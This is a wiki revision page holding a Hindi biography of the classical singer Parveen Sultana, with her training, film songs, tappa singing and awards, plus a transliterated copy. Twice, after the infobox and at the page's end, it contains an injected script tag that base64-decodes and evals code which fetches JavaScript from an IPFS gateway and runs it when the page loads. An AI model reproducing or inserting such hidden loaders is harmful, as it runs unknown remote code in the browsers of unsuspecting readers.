Difference between revisions of "परवीन सुल्ताना"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 1: Line 1:
 +
{{सूचना बक्सा कलाकार
 +
|चित्र=Parveen-Sultana.jpg
 +
|चित्र का नाम=परवीन सुल्ताना
 +
|पूरा नाम=परवीन सुल्ताना
 +
|प्रसिद्ध नाम=
 +
|अन्य नाम=
 +
|जन्म=[[10 जुलाई]], [[1950]]
 +
|जन्म भूमि=[[असम]]
 +
|मृत्यु=
 +
|मृत्यु स्थान=
 +
|अविभावक=
 +
|पति/पत्नी=दिलशाद ख़ान
 +
|संतान=
 +
|कर्म भूमि=[[भारत]]
 +
|कर्म-क्षेत्र=शास्त्रीय गायन
 +
|मुख्य रचनाएँ=
 +
|मुख्य फ़िल्में='गदर', 'कुदरत' और 'पाकीज़ा' आदि।
 +
|विषय=
 +
|शिक्षा=
 +
|विद्यालय=
 +
|पुरस्कार-उपाधि='[[पद्मश्री]]' ([[1976]]), 'गंधर्व कला नीधि' ([[1980]]), 'मियाँ तानसेन पुरस्कार' ([[1986]])
 +
|प्रसिद्धि=शास्त्रीय गायिका
 +
|विशेष योगदान=
 +
|नागरिकता=भारतीय
 +
|संबंधित लेख=
 +
|शीर्षक 1=
 +
|पाठ 1=
 +
|शीर्षक 2=
 +
|पाठ 2=
 +
|अन्य जानकारी=परवीन सुल्ताना ने मात्र बारह वर्ष की आयु में अपना प्रथम संगीत कार्यक्रम दिया था।
 +
|बाहरी कड़ियाँ=
 +
|अद्यतन=
 +
}}
 +
 
'''बेगम परवीन सुल्ताना''' (जन्म- [[10 जुलाई]], [[1950]], [[असम]]) [[भारत]] की प्रसिद्ध शास्त्रीय गायिका हैं। वह 'पटियाला घराना' से सम्बन्धित हैं। परवीन सुल्ताना ऐसी विलक्षण प्रतिभाशाली गायिका हैं, जिन्हें वर्ष [[1976]] में '[[पद्मश्री]]' से सम्मानित किया गया था। असमिया पृष्ठभूमि से ताल्लुक रखने वाली परवीन सुल्ताना ने पटियाला घराने की गायकी में अपना अलग मुकाम बनाया है। उनके परिवार में कई पीढ़ियों से [[शास्त्रीय संगीत]] की परम्परा रही है। उनके गुरुओं में आचार्य चिन्मय लाहिरी और उस्ताद दिलशाद ख़ान प्रमुख रहे हैं। गीत को अपनी अन्तरात्मा मानने वाली परवीन सुल्ताना की जन्म-भूमि असम और कर्म-भूमि [[मुम्बई]] रही है।
 
'''बेगम परवीन सुल्ताना''' (जन्म- [[10 जुलाई]], [[1950]], [[असम]]) [[भारत]] की प्रसिद्ध शास्त्रीय गायिका हैं। वह 'पटियाला घराना' से सम्बन्धित हैं। परवीन सुल्ताना ऐसी विलक्षण प्रतिभाशाली गायिका हैं, जिन्हें वर्ष [[1976]] में '[[पद्मश्री]]' से सम्मानित किया गया था। असमिया पृष्ठभूमि से ताल्लुक रखने वाली परवीन सुल्ताना ने पटियाला घराने की गायकी में अपना अलग मुकाम बनाया है। उनके परिवार में कई पीढ़ियों से [[शास्त्रीय संगीत]] की परम्परा रही है। उनके गुरुओं में आचार्य चिन्मय लाहिरी और उस्ताद दिलशाद ख़ान प्रमुख रहे हैं। गीत को अपनी अन्तरात्मा मानने वाली परवीन सुल्ताना की जन्म-भूमि असम और कर्म-भूमि [[मुम्बई]] रही है।
{{tocright}}
 
 
==जन्म तथा शिक्षा==
 
==जन्म तथा शिक्षा==
 
परवीन सुल्ताना का जन्म 10 जुलाई, 1950 को नोगोंग ग्राम, असम में हुआ था। उनके [[पिता]] का नाम इकरामुल माजिद और [[माता]] का नाम मारूफा माजिद था। परवीन के पिता उनके प्रथम गुरु थे और वे उनकी शिक्षा के प्रति बहुत सख्त थे। परवीन सुल्तान ने अपने दादा मोहम्मद नजीफ़ ख़ान से भी संगीत की शिक्षा पाई थी। बचपन से ही उन्हें संगीत में गहरी रूचि रही थी। उन्होंने अपना सबसे प्रथम संगीत कार्यक्रम बारह वर्ष कि आयु में दिया। उन्होंने पंडित लहरी से भी संगीत की शिक्षा अर्जित की और उसके बाद उस्ताद दिलशाद ख़ान से, जो बाद में उनके शौहर बने। परवीन सुल्ताना उन चुनिन्दा शास्त्रीय गायिकाओं में से एक हैं, जिन्हें ईश्वर ने एक ऐसी अनोखी और खूबसूरत आवाज़ से नवाजा, जिसका कोई सानी नहीं था। उनकी लगन और तालीम ने उन्हें खूबसूरत आवाज़ और एक गरिमामय व्यक्तित्व का धनी बनाया था, इसीलिए उन्हें 'भारतीय शास्त्रीय संगीत की रानी' कहा जाता है।
 
परवीन सुल्ताना का जन्म 10 जुलाई, 1950 को नोगोंग ग्राम, असम में हुआ था। उनके [[पिता]] का नाम इकरामुल माजिद और [[माता]] का नाम मारूफा माजिद था। परवीन के पिता उनके प्रथम गुरु थे और वे उनकी शिक्षा के प्रति बहुत सख्त थे। परवीन सुल्तान ने अपने दादा मोहम्मद नजीफ़ ख़ान से भी संगीत की शिक्षा पाई थी। बचपन से ही उन्हें संगीत में गहरी रूचि रही थी। उन्होंने अपना सबसे प्रथम संगीत कार्यक्रम बारह वर्ष कि आयु में दिया। उन्होंने पंडित लहरी से भी संगीत की शिक्षा अर्जित की और उसके बाद उस्ताद दिलशाद ख़ान से, जो बाद में उनके शौहर बने। परवीन सुल्ताना उन चुनिन्दा शास्त्रीय गायिकाओं में से एक हैं, जिन्हें ईश्वर ने एक ऐसी अनोखी और खूबसूरत आवाज़ से नवाजा, जिसका कोई सानी नहीं था। उनकी लगन और तालीम ने उन्हें खूबसूरत आवाज़ और एक गरिमामय व्यक्तित्व का धनी बनाया था, इसीलिए उन्हें 'भारतीय शास्त्रीय संगीत की रानी' कहा जाता है।
Line 22: Line 55:
 
[[Category:शास्त्रीय गायक कलाकार]][[Category:गायिका]][[Category:पद्म श्री]][[Category:प्रसिद्ध व्यक्तित्व]][[Category:चरित कोश]][[Category:प्रसिद्ध व्यक्तित्व कोश]][[Category:संगीत कोश]]
 
[[Category:शास्त्रीय गायक कलाकार]][[Category:गायिका]][[Category:पद्म श्री]][[Category:प्रसिद्ध व्यक्तित्व]][[Category:चरित कोश]][[Category:प्रसिद्ध व्यक्तित्व कोश]][[Category:संगीत कोश]]
 
__INDEX__
 
__INDEX__
 +
__NOTOC__

Revision as of 12:43, 23 December 2012

paravin sultana
poora nam paravin sultana
janm 10 julaee, 1950
janm bhoomi asam
pati/patni dilashad khan
karm bhoomi bharat
karm-kshetr shastriy gayan
mukhy filmean 'gadar', 'kudarat' aur 'pakiza' adi.
puraskar-upadhi 'padmashri' (1976), 'gandharv kala nidhi' (1980), 'miyaan tanasen puraskar' (1986)
prasiddhi shastriy gayika
nagarikata bharatiy
any janakari paravin sultana ne matr barah varsh ki ayu mean apana pratham sangit karyakram diya tha.

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

begam paravin sultana (janm- 10 julaee, 1950, asam) bharat ki prasiddh shastriy gayika haian. vah 'patiyala gharana' se sambandhit haian. paravin sultana aisi vilakshan pratibhashali gayika haian, jinhean varsh 1976 mean 'padmashri' se sammanit kiya gaya tha. asamiya prishthabhoomi se talluk rakhane vali paravin sultana ne patiyala gharane ki gayaki mean apana alag mukam banaya hai. unake parivar mean kee pidhiyoan se shastriy sangit ki parampara rahi hai. unake guruoan mean achary chinmay lahiri aur ustad dilashad khan pramukh rahe haian. git ko apani antaratma manane vali paravin sultana ki janm-bhoomi asam aur karm-bhoomi mumbee rahi hai.

janm tatha shiksha

paravin sultana ka janm 10 julaee, 1950 ko nogoang gram, asam mean hua tha. unake pita ka nam ikaramul majid aur mata ka nam maroopha majid tha. paravin ke pita unake pratham guru the aur ve unaki shiksha ke prati bahut sakht the. paravin sultan ne apane dada mohammad najif khan se bhi sangit ki shiksha paee thi. bachapan se hi unhean sangit mean gahari roochi rahi thi. unhoanne apana sabase pratham sangit karyakram barah varsh ki ayu mean diya. unhoanne pandit lahari se bhi sangit ki shiksha arjit ki aur usake bad ustad dilashad khan se, jo bad mean unake shauhar bane. paravin sultana un chuninda shastriy gayikaoan mean se ek haian, jinhean eeshvar ne ek aisi anokhi aur khoobasoorat avaz se navaja, jisaka koee sani nahian tha. unaki lagan aur talim ne unhean khoobasoorat avaz aur ek garimamay vyaktitv ka dhani banaya tha, isilie unhean 'bharatiy shastriy sangit ki rani' kaha jata hai.

filmoan mean gayan

paravin sultana ne kuchh filmoan mean bhi gayan kiya hai, jinamean 'gadar', 'kudarat' aur 'pakiza' adi haian, lekin 'kudarat' film git "hamean tumase pyar kitana, ye ham nahian janate" (sangit nirdeshak ar. di. barman) aur film "pakiza" ka 'kaun gali gayo shyam' sabase adhik pasand kiya gaya tha. shastriy sangit mean jahaan khyal gayan mean inako pravinata hasil rahi, vahian shastriy sugam sangit mean thumari, dadara, chaiti, kajari adi behad pasand ki geean. rag hansadhvani ka tarana shrotaoan ki vishesh pharamaish hua karata tha. vahian kabir ke bhajan bhi utani hi khoobasoorati se prastut kiye. film 'paravana' mean 1971 mean asha bhoansale ke sath paravin sultana ne 'piya ki gali' (sangitakar madan mohan) git gaya tha. gazal bhi vah utani hi madhurata aur doob kar gati haian, jitana shastriy sangit ka khyal. 'ye dhuaan sa kah se uthata hai' unake dvara gaee gee gazal kafi charchit rahi thi.

upashastriy sangit mean dakshata

paravin sultana ko upashastriy sangit mean dakshata prapt hai. 'tappa' ek vidha hai, jise gana sabhi ke vash ki bat nahian hoti. isaki vajah yah hai ki isamean avaz aur svaroan ko ghumate hue ek vishesh tarike se bahut santulit kram aur sadhe hue svaroan mean gaya jata hai. is ehatiyat ke sath ki jatil svar-sanrachana ke bad bhi svar bikharean nahian. paravin sultana ko tappe mean bhi maharath hasil thi. unaki tanean jharane ki tarah bahati to alap utane hi ganbhir aur gahare hote, jaise kisi gahare koop mean se oopar ko uthati dhvaniyaan. jitani mithas tar saptak mean utani hi bulandi mandr saptak ke svaroan mean, ye vividhata nissandeh ek kathin sadhana hai. kathin se kathin tanean vo itani asani se leti ki shrota ashchary chakit rah jate the.

puraskar v samman

  1. kliyopetra aauph myoozik - 1972
  2. padmashri - 1976
  3. gandharv kala nidhi - 1980
  4. miyaan tanasen puraskar - 1986
  5. sangit natak akadami puraskar - 1999


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

bahari k diyaan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>